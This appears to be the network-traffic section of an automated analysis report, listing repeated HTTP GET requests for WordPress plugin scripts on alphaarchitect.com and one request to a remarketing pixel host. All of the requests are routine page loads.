Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/libs/pickadate/picker.min.js?ver=3.6.2 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/printfriendly.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /px/smart/?c=2645100a8c95db0 HTTP/1.1Host: a.remarketstats.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/libs/pickadate/picker.date.min.js?ver=3.6.2 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/mailchimp-top-bar/assets/script.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/libs/pickadate/picker.time.min.js?ver=3.6.2 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/js/common.min.js?ver=2.9.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/libs/cropper/cropper.min.js?ver=1.6.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/js/common-frontend.min.js?ver=2.9.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/js/um-modal.min.js?ver=2.9.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-util.min.js?ver=d4c9c51d21a0c26e910ec9a6a2b06883 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/libs/um-confirm/um-confirm.min.js?ver=1.0 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/libs/tipsy/tipsy.min.js?ver=1.0.0a HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-includes/js/underscore.min.js?ver=1.13.7 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/libs/pickadate/picker.min.js?ver=3.6.2 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/libs/jquery-form/jquery-form.min.js?ver=2.9.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/ultimate-member/assets/libs/fileupload/fileupload.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/libs/pickadate/picker.date.min.js?ver=3.6.2 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/js/um-functions.min.js?ver=2.9.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/js/um-responsive.min.js?ver=2.9.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/js/um-conditional.min.js?ver=2.9.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/libs/select2/select2.full.min.js?ver=4.0.13 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/libs/pickadate/picker.time.min.js?ver=3.6.2 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/js/common.min.js?ver=2.9.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/js/common-frontend.min.js?ver=2.9.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/libs/cropper/cropper.min.js?ver=1.6.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/js/um-modal.min.js?ver=2.9.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/ultimate-member/assets/libs/select2/i18n/en.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/libs/raty/um-raty.min.js?ver=2.6.0 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/libs/jquery-form/jquery-form.min.js?ver=2.9.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/js/um-scripts.min.js?ver=2.9.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/js/um-profile.min.js?ver=2.9.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
